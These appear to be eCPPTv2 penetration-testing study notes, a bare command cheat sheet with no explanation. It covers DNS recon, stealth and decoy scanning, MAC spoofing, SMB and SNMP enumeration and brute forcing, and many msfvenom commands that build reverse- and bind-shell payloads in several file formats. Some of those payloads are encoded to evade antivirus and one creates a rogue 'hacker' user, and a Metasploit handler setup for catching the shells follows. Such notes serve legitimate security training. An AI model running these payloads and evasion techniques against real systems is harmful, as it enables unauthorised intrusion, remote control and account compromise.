eCPPTv2 Notes
whois <domain>
whois -h <server> <domain>
nslookup <target>
nslookup -query=mx <domain>
nslookup -query=ns <domain>
nslookup -query=any <domain>
dig +nocmd <domain> MX +noall +answer
dig +nocmd <domain> A +noall +answer
dig +nocmd <domain> NS +noall +answer
dig +nocmd axfr <@name_server> <domain> +noall +answer
fierce -dns <domain> --dnsserver <server>
dnsmap <domain>
dnsrecon -d <domain>
dnsenum <domain>
nmap -sn <target> --disable-arp-ping
nmap -sn -PS <target> --disable-arp-ping
nmap -sn -PA <target> --disable-arp-ping
nmap -sn -PE <target> --disable-arp-ping
fping -A <target>
Send ICMP echo request packets, display only the hosts that are alive, and set the number of retries (-r):
fping -A <target> -r <number of retries>
Specify a range of IP addresses, such as a whole subnet (-g), send ICMP packets to every host in the subnet, display the time required to reach each host (-e), and make fping quiet (-q):
fping -q -a -g <target> <subnet to scan> -r 0 -e
hping3 -S -p <port> <target>
hping3 -S --scan 1-1000 <target>
hping3 -S --scan all <target>
hping3 -S --scan 80,445,53,21 <target>
nmap -sS <target>
nmap -sS <target> -n -Pn
nmap -sT <target> -F
nmap -sU <target>
nmap -sN <target>
nmap -sX <target>
nmap -sF <target>
/usr/share/nmap/scripts/
nmap -c
nmap --script
nmap --script-updatedb
nmap --script-help "smb*" and discovery
nmap --script whois-domain <website> -sn
nmap --script smb-os-discovery -p 445 <target>
nmap --script smb-enum-shares <target> -p 445
nmap --script auth <target>
Idle scan is stealthy because the target host never sees the real attacker's IP address; it only sees traffic coming from the zombie host.
hping3 -S -r -p <port> <zombie_ip>
hping3 -a <zombie_ip> -S -p <dst_port> <target>
nmap --script ipidseq <target> -p <port>
nmap -Pn -sI -p <dst_port> <zombie_ip>:<src_port> <target>
nmap -f <target> -n --disable-arp-ping -Pn
nmap -sS -f <target>
nmap -p <port> -D <decoy1,ME,decoy2,etc..> <target>
nmap -D RND:10 <target> -sS -p <port> -Pn --disable-arp-ping
nmap --source-port 53 <target> -sS
hping3 -S -s 53 --scan known <target>
nmap --spoof-mac <choose vendor MAC i.e. Apple or Intel etc..> <target> -p <port> -Pn --disable-arp-ping -n
nmap --spoof-mac 0 <target> -p <port> -Pn --disable-arp-ping -n
nmap -iL hosts.list -sS -p <port> --randomize-hosts -T 2
hping3 -a <alive host on network> -S -p <port> <target>
nmap -sS --data-length 10 -p 21 <target>
nmap -sS -p 135 <target>
nbtscan -v <target>
nmblookup -A <target>
smbclient -L <target>
enum4linux -a <target>
smbclient \\\\<target>\\<share> -N
rpcclient -N -U "" <target>
nmap --script=smb-brute <target>
snmpwalk -c <c_string> -v <version> <target>
nmap -sU -p 161 --script=snmp-brute <target>
nmap -sU -p 161 --script snmp-win32-users <target>
ls -l /usr/share/nmap/scripts | grep -i snmp
snmpwalk -c <c_string> -v <version> <target> <OID>
snmpset -c <c_string> -v <version> <target> <OID> <value_type> <value>
echo public > community
echo private >> community
echo manager >> community
onesixtyone -c community <target>
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.25.1.6.0
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.25.4.2.1.2
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.25.4.2.1.4
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.25.2.3.1.4
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.25.6.3.1.2
snmpwalk -c <community string> -<version> <target> 1.3.6.1.4.1.77.1.2.25
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.6.13.1.3
msfvenom -l
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf
msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war
msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
msfvenom -p cmd/unix/reverse_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.pl
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f c
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe
use exploit/multi/handler
set PAYLOAD <Payload name>
set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
run
ip.addr==<ip>
ip.src==<ip>
ip.dst==<ip>
http.request.method == POST
arp
http
icmp
http or dns
ip.addr==<ip> and (dns or http)
http and ip.src!=<ip>
tcp.port==<port>
udp.port==<port>
tcp.flags.syn==1
tcp.flags.syn==1 and tcp.flags.ack==1
tcp.flags.syn==1 and tcp.flags.ack==1 and ip.addr==192.168.1.0/24
tcp contains "string"